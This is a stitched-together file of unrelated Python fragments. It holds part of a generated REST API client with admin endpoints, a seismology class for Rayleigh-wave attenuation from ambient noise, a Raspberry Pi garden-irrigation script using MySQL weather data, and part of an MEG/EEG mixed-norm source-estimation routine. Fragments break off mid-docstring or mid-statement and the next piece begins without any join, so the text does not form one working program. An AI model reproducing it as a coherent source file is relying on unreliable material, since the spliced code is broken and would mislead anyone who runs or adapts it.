response_type='LabInfoResponse', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_statistics(self, **kwargs): # noqa: E501
"""Returns statistics about this Lab instance (admin-only). # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_statistics(async_req=True)
>>> result = thread.get()
:param async_req bool
:param str authorization: Authorization Token
:return: LabStatisticsResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_statistics_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.get_statistics_with_http_info(**kwargs) # noqa: E501
return data
def get_statistics_with_http_info(self, **kwargs): # noqa: E501
"""Returns statistics about this Lab instance (admin-only). # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_statistics_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param str authorization: Authorization Token
:return: LabStatisticsResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['authorization'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_statistics" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
if 'authorization' in params:
header_params['authorization'] = params['authorization'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/api/admin/statistics', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='LabStatisticsResponse', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
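# Every endpoint above follows the same generated pattern: the public method
# forwards **kwargs to its *_with_http_info twin, which validates them against
# all_params, splits them into query/header parameters, and delegates to
# ApiClient.call_api with the endpoint path, HTTP verb and response_type.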
def reset_all_workspaces(self, **kwargs): # noqa: E501
"""Resets all workspaces. Use with caution (admin-only). # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.reset_all_workspaces(async_req=True)
>>> result = thread.get()
:param async_req bool
:param str authorization: Authorization Token
:return: | |
Attenuation From Seismic Ambient Noise:
Numerical Validation and Application, JGR
"""
def __init__(self, src, savedir=None, verbose=True):
"""
Parameters
----------
src : str
Absolute path to the directory containing the files associated with
the continuous seismograms
savedir : str
Absolute path to the directory where the results are saved
verbose : bool
Whether or not information on progress is printed in the console
"""
self.verbose = verbose
self.src = src
savedir = os.path.dirname(src) if savedir is None else savedir
self.savedir = os.path.join(savedir, 'an_attenuation')
os.makedirs(self.savedir, exist_ok=True)
self.files = self.get_files()
def __str__(self):
string = '\nRAYLEIGH-WAVE ATTENUATION FROM SEISMIC AMBIENT NOISE'
separators = len(string)
string += '\n%s'%('='*separators)
stations = set(['.'.join(i.split('.')[:2]) for i in self.files])
string += '\nRECEIVERS: %s'%(len(stations))
string += '\n%s'%('='*separators)
string += '\nSOURCE DIR: %s'%self.src
string += '\nSAVE DIR: %s'%self.savedir
return string
def __repr__(self):
return str(self)
def get_files(self):
"""
Retrieves the files to be processed for extracting Rayleigh-wave
attenuation on the vertical component.
Returns
-------
files : list of str
e.g. ['net1.sta1.00.BHZ.sac', 'net1.sta2.00.BHZ.sac']
"""
files = []
for file in sorted(os.listdir(self.src)):
channel = file.split('.')[-2]
if 'HZ' in channel:
files.append(file)
return files
def get_stations_coords(self, files):
"""
Retrieves the geographic coordinates associated with each receiver
Parameters
----------
files: list of str
Names of the files corresponding with the continuous seismograms,
located in the `src` directory
Returns
-------
coords : dict
each key corresponds to a station code ($network_code.$station_code)
and each value is a tuple containing latitude and longitude of the
station. For example:
{ net1.sta1 : (lat1, lon1),
net1.sta2 : (lat2, lon2),
net2.sta3 : (lat3, lon3)
}
"""
coords = {}
for file in files:
station_code = '.'.join(file.split('.')[:2])
tr = read(os.path.join(self.src, file))[0]
lat, lon = tr.stats.sac.stla, tr.stats.sac.stlo
coords[station_code] = (lat, lon)
if self.verbose:
print(station_code, '%.3f'%lat, '%.3f'%lon)
return coords
def prepare_data(self, recompute=False):
"""
Saves to disk the geographic coordinates associated with each receiver.
These are saved to $self.savedir/stations.pickle
The stations.pickle file contains a dictionary object where each key
corresponds to a station code ($network_code.$station_code) and each
value is a tuple containing latitude and longitude of the station.
For example:
{ net1.sta1 : (lat1, lon1),
net1.sta2 : (lat2, lon2),
net2.sta3 : (lat3, lon3)
}
Parameters
----------
recompute : bool
If True, the station coordinates and times will be removed from
disk and recalculated. Otherwise (default), if they are present,
they will be loaded into memory, avoiding any computation. This
parameter should be set to True whenever one has added files to
the source directory
"""
savefile = os.path.join(self.savedir, 'stations.pickle')
if recompute:
remove_file(savefile)
if not os.path.exists(savefile):
coords = self.get_stations_coords(self.files)
save_pickle(savefile, coords)
else:
coords = load_pickle(savefile)
self.stations = coords
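# Typical workflow around prepare_data (sketch; the class name is cut off at
# the top of this excerpt and is assumed here to be AmbientNoiseAttenuation):
#
#   >>> an = AmbientNoiseAttenuation(src='/path/to/sac/files')
#   >>> an.prepare_data()                      # fills an.stations
#   >>> an.parameterize(cell_size=2, overlap=0.5, min_no_stations=6)
#   >>> an.compute_ffts(fs=1, window_length=3600)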
def parameterize(self, cell_size, overlap=0.5, min_no_stations=6,
plotting=True, plot_resolution='110m'):
"""
Creates the equal area (possibly overlapping) parameterization used in
the subsequent analysis. The equal-area grid is created through the
EqualAreaGrid class of seislib.
The parameterization is saved at $self.savedir/parameterization.pickle
Parameters
----------
cell_size : float, int (in degrees)
Size of each grid cell of the resulting parameterization
overlap : float
If > 0, the parameterization will be overlapping in space by the
specified extent [e.g., Magrini et al. 2021]. Default is 0.5
min_no_stations : int
Minimum number of stations falling within each grid-cell. If the
value is not reached, the grid-cell in question is removed from the
parameterization
plotting : bool
If True, a figure on the resulting parameterization is displayed
plot_resolution : str
Resolution of the Earth features displayed in the figure. Passed to
cartopy.feature.NaturalEarthFeature. Valid arguments are '110m',
'50m', '10m'. Default is '110m'
References
----------
Magrini et al. 2021, Rayleigh‑wave attenuation across the conterminous
United States in the microseism frequency band, Scientific Reports
"""
def add_overlap(grid, overlap_east=0.5, overlap_north=0.5):
mesh = grid.mesh
dlat = (1-overlap_north) * (mesh[:,1]-mesh[:,0])
old_mesh = mesh.copy()
for i in range(1, round(1 / (1-overlap_north))):
new_lats = old_mesh[:, :2] + dlat.reshape(-1, 1)*i
mesh = np.row_stack((
mesh, np.column_stack((new_lats, old_mesh[:, 2:]))
))
dlon = (1-overlap_east) * (mesh[:,3]-mesh[:,2])
old_mesh = mesh.copy()
for i in range(1, round(1 / (1-overlap_east))):
new_lons = old_mesh[:, 2:] + dlon.reshape(-1, 1)*i
mesh = np.row_stack((
mesh, np.column_stack((old_mesh[:, :2], new_lons))
))
return sort_mesh(mesh)
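# add_overlap shifts copies of the mesh north/east by multiples of
# (1 - overlap) cell widths; e.g. with overlap=0.5 the mesh is doubled once
# northward and once eastward, yielding 4x the original number of cells.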
def sort_mesh(mesh):
mesh = mesh[np.argsort(mesh[:,0])][::-1]
final_indexes = []
indexes = [0]
lb, ub = mesh[0, :2]
for i, (lat1, lat2, lon1, lon2) in enumerate(mesh[1:], 1):
if lat1==lb and lat2==ub:
indexes.append(i)
else:
final_indexes.extend(list(
np.array(indexes)[np.argsort(mesh[indexes, 2])]
))
indexes = [i]
lb, ub = lat1, lat2
if indexes:
final_indexes.extend(list(
np.array(indexes)[np.argsort(mesh[indexes, 2])]
))
return mesh[final_indexes]
def stations_per_pixel(grid, station_codes, station_coords):
sta_per_pixel = []
sta_in_pixel = []
for lat1, lat2, lon1, lon2 in grid.mesh:
idx_stations_in_pixel = np.flatnonzero(
(station_coords[:,0]>=lat1) \
& (station_coords[:,0]<=lat2) \
& (station_coords[:,1]>=lon1) \
& (station_coords[:,1]<=lon2))
n_stations = idx_stations_in_pixel.size
sta_per_pixel.append(n_stations)
sta_in_pixel.append(list(station_codes[idx_stations_in_pixel]))
return np.array(sta_per_pixel), sta_in_pixel
def plot_stations_and_grid(station_coords, grid, map_boundaries):
def plot_one_pixel(coords, ax):
lat1, lat2, lon1, lon2 = coords
paths = [
((lon1, lon1), (lat1, lat2)),
((lon1, lon2), (lat2, lat2)),
((lon2, lon2), (lat2, lat1)),
((lon2, lon1), (lat1, lat1)),
]
for x, y in paths:
ax.plot(x, y, 'r', transform=transform)
transform = ccrs.PlateCarree()
fig = plt.figure()
ax = fig.add_subplot(1, 1, 1, projection=ccrs.Mercator())
ax.set_extent(map_boundaries, ccrs.PlateCarree())
add_earth_features(ax,
scale=plot_resolution,
oceans_color='water',
lands_color='land')
ax = grid.plot(ax=ax, show=False)
ax.plot(*station_coords.T[::-1], '^b', transform=transform)
plot_one_pixel(grid.mesh[0], ax)
plt.show()
def plot_stations_per_pixel(sta_per_pixel):
plt.figure()
plt.hist(sta_per_pixel, bins=10, ec='w')
plt.xlabel('Stations per sub-array', labelpad=10)
plt.show()
def get_map_boundaries(grid):
dlon = (grid.lonmax - grid.lonmin) * 0.05
dlat = (grid.latmax - grid.latmin) * 0.05
lonmin = grid.lonmin-dlon if grid.lonmin-dlon > -180 else grid.lonmin
lonmax = grid.lonmax+dlon if grid.lonmax+dlon < 180 else grid.lonmax
latmin = grid.latmin-dlat if grid.latmin-dlat > -90 else grid.latmin
latmax = grid.latmax+dlat if grid.latmax+dlat < 90 else grid.latmax
return (lonmin, lonmax, latmin, latmax)
station_codes, station_coords = zip(*list(self.stations.items()))
station_codes = np.array(station_codes)
station_coords = np.array(station_coords)
latmin, latmax = station_coords[:,0].min(), station_coords[:,0].max()
lonmin, lonmax = station_coords[:,1].min(), station_coords[:,1].max()
grid = EqualAreaGrid(cell_size,
latmin=latmin,
latmax=latmax,
lonmin=lonmin,
lonmax=lonmax,
)
if overlap > 0:
mesh = add_overlap(grid, overlap_east=overlap, overlap_north=overlap)
grid.update_grid_params(mesh)
no_stations = stations_per_pixel(grid, station_codes, station_coords)[0]
grid.select_cells(np.flatnonzero(no_stations >= min_no_stations))
no_stations, codes = stations_per_pixel(grid,
station_codes,
station_coords)
data = {
'grid': grid.mesh,
'no_stations': no_stations,
'station_codes': [sorted(c) for c in codes]
}
save_pickle(os.path.join(self.savedir, 'parameterization.pickle'),
data)
if plotting:
map_boundaries = get_map_boundaries(grid)
plot_stations_and_grid(station_coords, grid, map_boundaries)
plot_stations_per_pixel(no_stations)
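    # Hypothetical usage sketch (the instance name `an` is illustrative):
    #   an.prepare_data()
    #   an.parameterize(cell_size=2.5, overlap=0.5, min_no_stations=6)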
def compute_ffts(self, fs=1, window_length=3600):
""" Computes the Fourier transforms for all the continuous data.
A directory $self.savedir/fft will be created, and all Fourier
transforms will be saved within it. Within the same directory, two other
files will be created: (i) the frequency vector associated with each
Fourier transform, named frequencies.npy, and (ii) a dictionary object
where the starting and ending times of all continuous seismograms
are stored, named times.pickle
Parameters
----------
fs : int, float
Target sampling rate of the continuous seismograms. If some
seismogram is characterized by a different sampling rate, it will
be resampled
        window_length : int, float (s)
Length of the time windows used to perform the cross correlations
Warning
-------
        The operation might require a relatively large amount of disk space,
        depending on the quantity of continuous seismograms available and on
        the chosen sampling rate (possibly even more than the size of the
        original data). This is necessary to considerably speed up the
        operations needed to extract the attenuation measurements, mostly the
        calculation of the average power spectral density of each sub-array
        associated with each grid cell of the parameterization.
"""
def fourier_transform(x, window_samples):
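            # Demean each window and apply a ~5% cosine taper before the FFT,
            # limiting spectral leakage at the window edges.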
taper = cosine_taper(window_samples, p=0.05)
x = detrend(x, type='constant')
x *= taper
return rfft(x, window_samples)
def start_end_indexes(tr, times):
starttime = tr.stats.starttime.timestamp
endtime = tr.stats.endtime.timestamp
start_idx = np.argmin( np.abs(np.array(times) - starttime) )
end_idx = np.argmin( np.abs(np.array(times) - endtime) )
return start_idx, end_idx
def round_time(t, window_length, kind='starttime'):
dt = window_length if kind=='starttime' else 0
tstamp = t.timestamp
#!/usr/bin/env python
#
# Irrigation system
# Release 2020-07-05 First version
# Release 2021-02-09 Added queries
# Release 2021-02-22 Added meteolib and calculation of evaporation via the Makkink formula
# Release 2021-02-24 Changed days to 28, as it suggested adding water too early
# Release 2021-03-01 Added irrigation table with historical amount of water sprinkled
# Release 2021-03-02 Added Watering: define zone, set RPi on/off
# Release 2021-03-08 Changed from daily figures to per 5m (raw data). Changed to 35 days
# Release 2021-03-14 Updated what it prints without logging
# Release 2021-04-08 Fixed stability for NULL entries in database (happens if temporarily disconnected from weather station)
# Release 2021-04-11 Updated driving the sprinkler system with new motorized ball valves instead of solenoid valves
# Added front garden watering, optimized per minute flow measurement
# Release 2021-04-17 Updated for actual working on Raspberry Pi (relay PINs, Keyboard interrupts)
# Release 2021-04-21 Forked for fixed watering during X minutes
# Release 2021-04-22 Adding more structures with classes and files
# Release 2021-04-29 Changed Zone no_barrel to required water pressure (minimal flow)
# Release 2021-05-13 Flipped flowmeter pins 11 and 16
# Release 2021-05-14 Debugging connection issues with fetching row by row
# Release 2021-05-25 Fixing RPi import error to run correctly (emulating) on development host
# Release 2021-06-04 Fixed some logging, added shadow factor (how much a zone is exposed to the sun)
# Release 2021-06-07 Added SigTerm to gracefully exit the process
# Release 2021-06-12 Renamed to 'irrigate', changed relay for grass to 4, and pin sprinkler to 15
# Release 2021-08-07 Added file logging also going to systemd log (journal), added better messages when no water sources
# Release 2021-09-12 Replaced relay board, re-distributed PINs
# Release 2021-09-18 Added MAX_IRRIGATION to limit daily amount of water
#
# TODO
# - Issue with flow vs pressure: Sprinklers generate flow of only ~2, but pressure is good...
# - Fix multiple zone logging on command line (split the command line and find splitted in list)
# - Add expected flow rate to put max timer?
# - Somehow detect if flow meters are working...
# - Test MySQL connection parameters (e.g. if none provided, if -a provided and only writing)
# - Add evaporation calculation-only mode (to run the script to predict/inform about the upcoming irrigation)
# - Recover nicely if cannot connect to database (network down)
#
# Author <NAME>
#
# Although there is an explicit copyright on this source code, anyone may use it freely under a
# "Creative Commons Naamsvermelding-NietCommercieel-GeenAfgeleideWerken 3.0 Nederland" license.
# Please check http://creativecommons.org/licenses/by-nc-nd/3.0/nl/ for details
#
# This software is provided as is and comes with absolutely no warranty.
# The author is not responsible or liable (direct or indirect) to anyone for the use or misuse of this software.
# Any person using this software does so entirely at his/her own risk.
# That person bears sole responsibility and liability for any claims or actions, legal or civil, arising from such use.
# If you believe this software is in breach of anyone's copyright you will inform the author immediately so the offending material
# can be removed upon receipt of proof of copyright for that material.
#
progname='irrigate.py'
version = "2021-09-18"
import sys
import signal
import logging
from systemd import journal
import argparse
import time
from time import sleep
from datetime import datetime
import mysql.connector
import numpy
import math
import socket
import threading
# Trying to import Raspberry Pi
try:
import RPi.GPIO as GPIO
except ImportError:
    # Just continue if the import fails; we check later whether we are running on an RPi
pass
import makkink_evaporation
# See also (Dutch) https://www.knmi.nl/kennis-en-datacentrum/achtergrond/verdamping-in-nederland
# And from page 22 of https://edepot.wur.nl/136999 it seems Makkink is indicating too much for grass by 0.88-0.92
# Typically the evaporation seems to be too high, so correcting with a factor
EVAP_FACTOR = 1.0
# How many days of evaporation to look back; should be aligned with how often to irrigate???
EVAP_RANGE = 14
# How much water maximally to irrigate per square meter
MAX_IRRIGATION = 10
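# Illustrative back-of-the-envelope (a sketch, not the exact code below): the
# water deficit per m2 over the look-back window is roughly
#   deficit = EVAP_FACTOR * sum(evaporation) - sum(rain)
# and whatever is actually irrigated is capped at MAX_IRRIGATION liters per m2.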
# Water Source and Zone names
source_barrel_name = "Barrel"
source_drinking_name = "Drinking"
zone_grass_name = "Grass (sweat)"
zone_grass_area = 10 * 8
zone_grass_shadow = 0.9 # Almost all day in the sun
zone_grass_min_flow = 0.5 # sweating / soaker hose does not need a lot of pressure / flow
zone_front_name = "Front (drip)"
zone_front_area = 12 * 4 + 8 * 4
zone_front_shadow = 0.7 # Almost all day in the sun, but well vegetated
zone_front_min_flow = 0.5 # dripping hose does not need a lot of pressure / flow
zone_side_name = "Side (sprinkler)"
zone_side_area = 10 * 4
zone_side_shadow = 0.7 # Morning shadows
zone_side_min_flow = 5.0   # sprinklers need quite a lot of pressure / flow
# Settings for Relay board 2 (water source ball valves)
valve_drinking_PIN = 31
valve_barrel_PIN = 32
# Settings for Relay board 4 (solenoids for up to 4 irrigation areas)
valve_grass_PIN = 35
valve_front_PIN = 36
valve_sprinkler_PIN = 37
#valve_SPARE_PIN = 38
# Settings for Flow meter GPIO pins
flow_grass_PIN = 7 # Yellow wire
flow_front_PIN = 11 # Green wire
flow_sprinkler_PIN = 15 # Purple wire
def parse_arguments(logger):
################################################################################################################################################
    # Command-line argument parsing
################################################################################################################################################
parser = argparse.ArgumentParser(prog=progname, description='Automatic Irrigation script', epilog="Copyright (c) <NAME>")
parser.add_argument("-l", "--log", help="Logging level, can be 'none', 'info', 'warning', 'debug', default='none'", default='none')
parser.add_argument("-f", "--logfile", help="Logging output, can be 'stdout', or filename with path, default='stdout'", default='stdout')
parser.add_argument("-d", "--days", help="How many days to look back, default %d (exclusive with amount)" % EVAP_RANGE, default=EVAP_RANGE)
parser.add_argument("-a", "--amount", help="How many liters per m2 to irrigate (exclusive with days)", default = '0')
parser.add_argument("-z", "--zones", help="Zone(s) to irrigate, can be 'grass', 'sprinkler', 'front' or multiple. Default is all", default='all', nargs='*')
parser.add_argument("-i", "--info", help="Do not actually irrigate, just show what it would have done", default=False, action="store_true")
parser.add_argument("-e", "--emulate", help="Do not actually open/close valves or store data", default=False, action="store_true")
parser.add_argument("-s", "--server", help="MySQL server or socket path, default='localhost'", default='localhost')
parser.add_argument("-u", "--user", help="MySQL user, default='root'", default='root')
parser.add_argument("-p", "--password", help="MySQL user password, default='password'", default='password')
args = parser.parse_args()
# Handle debugging messages
if (args.logfile == 'stdout'):
if (args.log == 'info'):
# info logging to systemd which already lists timestamp
logging.basicConfig(format='%(asctime)s - %(name)s - %(message)s')
else:
logging.basicConfig(format='%(asctime)s - %(name)s - %(levelname)s - %(lineno)d - %(message)s')
else:
logging.basicConfig(filename=args.logfile,format='%(asctime)s - %(levelname)s - %(lineno)d - %(message)s')
# Also log to systemd
# logger.addHandler(journal.JournalHandler())
# Setting loop duration; default 60s
loop_seconds = 60
if (args.log == 'debug'):
logger.setLevel(logging.DEBUG)
loop_seconds = 10
if (args.log == 'warning'):
logger.setLevel(logging.WARNING)
if (args.log == 'info'):
logger.setLevel(logging.INFO)
loop_seconds = 30
if (args.log == 'error'):
logger.setLevel(logging.ERROR)
if (float(args.amount) != 0):
# If amount is specified, ignore days
days = 0
amount = float(args.amount)
else:
days = int(args.days)
amount = 0
if args.emulate:
emulating = True
else:
emulating = False
if args.info:
info = True
emulating = True
else:
info = False
zones = args.zones
mysql_host=args.server
mysql_user=args.user
mysql_passwd=<PASSWORD>
# return parsed values
return (loop_seconds, days, amount, zones, info, emulating, mysql_host, mysql_user, mysql_passwd)
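# Example invocation (illustrative; all flags as defined in the parser above):
#   ./irrigate.py --log info --days 14 --zones grass front --emulate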
def handle_sigterm(sig, frame):
print("SigTerm received, raising SystemExit")
raise(SystemExit)
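# Sketch of how the handler is presumably wired up in the main flow:
#   signal.signal(signal.SIGTERM, handle_sigterm)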
def load_evaporation( logger, \
days, \
mysql_host, \
mysql_user, \
mysql_passwd ):
logger.info("Opening MySQL Database weewx on %s", mysql_host)
db = mysql.connector.connect(user=mysql_user, password=<PASSWORD>, host=mysql_host, database='weewx')
cursor = db.cursor()
# Get the per 5m data from the past X days
# mysql> select dateTime, FROM_UNIXTIME(dateTime), outHumidity, outTemp, pressure, radiation, rain from archive where dateTime >= UNIX_TIMESTAMP(NOW() - INTERVAL 2 DAY) LIMIT 10;
# +------------+-------------------------+-------------+-------------+----------+---------------------+------+
# | dateTime | FROM_UNIXTIME(dateTime) | outHumidity | outTemp | pressure | radiation | rain |
# +------------+-------------------------+-------------+-------------+----------+---------------------+------+
# | 1614630600 | 2021-03-01 21:30:00 | 82 | 4.7 | 1028.1 | 0 | 0 |
# | 1614630900 | 2021-03-01 21:35:00 | 82 | 4.6381 | 1028.08 | 0 | 0 |
# | 1614631200 | 2021-03-01 21:40:00 | 82 | 4.53333 | 1028.12 | 0 | 0 |
# ...
# | 1614839700 | 2021-03-04 07:35:00 | 88 | 5.1 | 1018.3 | 0 | 0.3 |
# | 1614840000 | 2021-03-04 07:40:00 | 88 | 5.1 | 1018.26 | 0 | 0 |
# | 1614840300 | 2021-03-04 07:45:00 | 88 | 5.1 | 1018.12 | 0.0744857142857143 | 0.3 |
# | 1614840600 | 2021-03-04 07:50:00 | 88 | 5.1 | 1018.27 | 0.0744857142857143 | 0 |
# ...
# | 1615209000 | 2021-03-08 14:10:00 | 44.619 | 11.0143 | 1019.96 | 631.790574761905 | 0 |
    # ...
positive integer.'
' Got dgap_freq = %s' % dgap_freq)
pca = True
if not isinstance(evoked, list):
evoked = [evoked]
_check_reference(evoked[0])
all_ch_names = evoked[0].ch_names
if not all(all_ch_names == evoked[i].ch_names
for i in range(1, len(evoked))):
raise Exception('All the datasets must have the same good channels.')
forward, gain, gain_info, whitener, source_weighting, mask = _prepare_gain(
forward, evoked[0].info, noise_cov, pca, depth, loose, rank,
weights, weights_min)
sel = [all_ch_names.index(name) for name in gain_info['ch_names']]
M = np.concatenate([e.data[sel] for e in evoked], axis=1)
# Whiten data
logger.info('Whitening data matrix.')
M = np.dot(whitener, M)
if time_pca:
U, s, Vh = linalg.svd(M, full_matrices=False)
if not isinstance(time_pca, bool) and isinstance(time_pca, int):
U = U[:, :time_pca]
s = s[:time_pca]
Vh = Vh[:time_pca]
M = U * s
# Scaling to make setting of alpha easy
n_dip_per_pos = 1 if is_fixed_orient(forward) else 3
alpha_max = norm_l2inf(np.dot(gain.T, M), n_dip_per_pos, copy=False)
alpha_max *= 0.01
gain /= alpha_max
source_weighting /= alpha_max
if n_mxne_iter == 1:
X, active_set, E = mixed_norm_solver(
M, gain, alpha, maxit=maxit, tol=tol,
active_set_size=active_set_size, n_orient=n_dip_per_pos,
debias=debias, solver=solver, dgap_freq=dgap_freq, verbose=verbose)
else:
X, active_set, E = iterative_mixed_norm_solver(
M, gain, alpha, n_mxne_iter, maxit=maxit, tol=tol,
n_orient=n_dip_per_pos, active_set_size=active_set_size,
debias=debias, solver=solver, dgap_freq=dgap_freq, verbose=verbose)
if time_pca:
X = np.dot(X, Vh)
M = np.dot(M, Vh)
# Compute estimated whitened sensor data
M_estimated = np.dot(gain[:, active_set], X)
if mask is not None:
        active_set_tmp = np.zeros(len(mask), dtype=bool)  # np.bool is deprecated
active_set_tmp[mask] = active_set
active_set = active_set_tmp
del active_set_tmp
if active_set.sum() == 0:
raise Exception("No active dipoles found. alpha is too big.")
# Reapply weights to have correct unit
X = _reapply_source_weighting(X, source_weighting, active_set)
outs = list()
residual = list()
cnt = 0
for e in evoked:
tmin = e.times[0]
tstep = 1.0 / e.info['sfreq']
Xe = X[:, cnt:(cnt + len(e.times))]
if return_as_dipoles:
out = _make_dipoles_sparse(
Xe, active_set, forward, tmin, tstep,
M[:, cnt:(cnt + len(e.times))],
M_estimated[:, cnt:(cnt + len(e.times))], verbose=None)
else:
out = _make_sparse_stc(Xe, active_set, forward, tmin, tstep)
outs.append(out)
cnt += len(e.times)
if return_residual:
residual.append(_compute_residual(forward, e, Xe, active_set,
gain_info))
logger.info('[done]')
if len(outs) == 1:
out = outs[0]
if return_residual:
residual = residual[0]
else:
out = outs
if return_residual:
out = out, residual
return out
def _window_evoked(evoked, size):
"""Window evoked (size in seconds)."""
if isinstance(size, (float, int)):
lsize = rsize = float(size)
else:
lsize, rsize = size
evoked = evoked.copy()
sfreq = float(evoked.info['sfreq'])
lsize = int(lsize * sfreq)
rsize = int(rsize * sfreq)
lhann = np.hanning(lsize * 2)[:lsize]
rhann = np.hanning(rsize * 2)[-rsize:]
window = np.r_[lhann, np.ones(len(evoked.times) - lsize - rsize), rhann]
evoked.data *= window[None, :]
return evoked
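# e.g. with sfreq=1000 Hz, _window_evoked(evoked, 0.02) ramps the first and
# last 20 samples (20 ms) with half-Hanning windows and leaves the rest intact.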
@verbose
def tf_mixed_norm(evoked, forward, noise_cov,
loose='auto', depth=0.8, maxit=3000,
tol=1e-4, weights=None, weights_min=0., pca=True,
debias=True, wsize=64, tstep=4, window=0.02,
return_residual=False, return_as_dipoles=False,
alpha=None, l1_ratio=None, dgap_freq=10, rank=None,
verbose=None):
"""Time-Frequency Mixed-norm estimate (TF-MxNE).
Compute L1/L2 + L1 mixed-norm solution on time-frequency
dictionary. Works with evoked data [1]_ [2]_.
Parameters
----------
evoked : instance of Evoked
Evoked data to invert.
forward : dict
Forward operator.
noise_cov : instance of Covariance
Noise covariance to compute whitener.
loose : float in [0, 1] | 'auto'
Value that weights the source variances of the dipole components
that are parallel (tangential) to the cortical surface. If loose
is 0 then the solution is computed with fixed orientation.
If loose is 1, it corresponds to free orientations.
The default value ('auto') is set to 0.2 for surface-oriented source
space and set to 1.0 for volumic or discrete source space.
%(depth)s
maxit : int
Maximum number of iterations.
tol : float
Tolerance parameter.
weights: None | array | SourceEstimate
Weight for penalty in mixed_norm. Can be None or
1d array of length n_sources or a SourceEstimate e.g. obtained
with wMNE or dSPM or fMRI.
weights_min: float
Do not consider in the estimation sources for which weights
is less than weights_min.
pca: bool
If True the rank of the data is reduced to true dimension.
debias: bool
Remove coefficient amplitude bias due to L1 penalty.
wsize: int or array-like
Length of the STFT window in samples (must be a multiple of 4).
If an array is passed, multiple TF dictionaries are used (each having
its own wsize and tstep) and each entry of wsize must be a multiple
of 4. See [3]_.
tstep: int or array-like
Step between successive windows in samples (must be a multiple of 2,
a divider of wsize and smaller than wsize/2) (default: wsize/2).
If an array is passed, multiple TF dictionaries are used (each having
its own wsize and tstep), and each entry of tstep must be a multiple
of 2 and divide the corresponding entry of wsize. See [3]_.
window : float or (float, float)
Length of time window used to take care of edge artifacts in seconds.
        It can be a single float, or a tuple of two floats if the values
        differ for the left and right window lengths.
return_residual : bool
If True, the residual is returned as an Evoked instance.
return_as_dipoles : bool
If True, the sources are returned as a list of Dipole instances.
alpha : float in [0, 100) or None
Overall regularization parameter.
If alpha and l1_ratio are not None, alpha_space and alpha_time are
overridden by alpha * alpha_max * (1. - l1_ratio) and alpha * alpha_max
        * l1_ratio. 0 means no regularization, 100 would give 0 active dipoles.
l1_ratio : float in [0, 1] or None
Proportion of temporal regularization.
If l1_ratio and alpha are not None, alpha_space and alpha_time are
overridden by alpha * alpha_max * (1. - l1_ratio) and alpha * alpha_max
* l1_ratio. 0 means no time regularization aka MxNE.
dgap_freq : int or np.inf
The duality gap is evaluated every dgap_freq iterations.
%(rank_None)s
.. versionadded:: 0.18
%(verbose)s
Returns
-------
stc : instance of SourceEstimate
Source time courses.
residual : instance of Evoked
The residual a.k.a. data not explained by the sources.
Only returned if return_residual is True.
See Also
--------
mixed_norm
References
----------
.. [1] <NAME>, <NAME>, <NAME>, <NAME>, <NAME>
"Time-Frequency Mixed-Norm Estimates: Sparse M/EEG imaging with
non-stationary source activations",
Neuroimage, Volume 70, pp. 410-422, 15 April 2013.
DOI: 10.1016/j.neuroimage.2012.12.051
.. [2] <NAME>, <NAME>, <NAME>, <NAME>, <NAME>
"Functional Brain Imaging with M/EEG Using Structured Sparsity in
Time-Frequency Dictionaries",
Proceedings Information Processing in Medical Imaging
Lecture Notes in Computer Science, Volume 6801/2011, pp. 600-611, 2011.
DOI: 10.1007/978-3-642-22092-0_49
.. [3] <NAME>, <NAME>, <NAME>, <NAME>, <NAME>.
"M/EEG source localization with multiscale time-frequency dictionaries",
6th International Workshop on Pattern Recognition in Neuroimaging
(PRNI), 2016.
DOI: 10.1109/PRNI.2016.7552337
"""
_check_reference(evoked)
all_ch_names = evoked.ch_names
info = evoked.info
if not (0. <= alpha < 100.):
raise ValueError('alpha must be in [0, 100). '
'Got alpha = %s' % alpha)
if not (0. <= l1_ratio <= 1.):
raise ValueError('l1_ratio must be in range [0, 1].'
' Got l1_ratio = %s' % l1_ratio)
alpha_space = alpha * (1. - l1_ratio)
alpha_time = alpha * l1_ratio
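    # e.g. alpha=40 with l1_ratio=0.03 gives alpha_space=38.8 and alpha_time=1.2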
if dgap_freq <= 0.:
raise ValueError('dgap_freq must be a positive integer.'
' Got dgap_freq = %s' % dgap_freq)
tstep = np.atleast_1d(tstep)
wsize = np.atleast_1d(wsize)
if len(tstep) != len(wsize):
raise ValueError('The same number of window sizes and steps must be '
'passed. Got tstep = %s and wsize = %s' %
(tstep, wsize))
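    # e.g. wsize=np.array([16, 64]) with tstep=np.array([4, 16]) uses two
    # multiscale STFT dictionaries, as in reference [3] of the docstring.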
forward, gain, gain_info, whitener, source_weighting, mask = _prepare_gain(
forward, evoked.info, noise_cov, pca, depth, loose, rank,
weights, weights_min)
n_dip_per_pos = 1 if is_fixed_orient(forward) else 3
if window is not None:
evoked = _window_evoked(evoked, window)
sel = [all_ch_names.index(name) for name in gain_info["ch_names"]]
M = evoked.data[sel]
# Whiten data
logger.info('Whitening data matrix.')
M = np.dot(whitener, M)
# Scaling to make setting of alpha easy
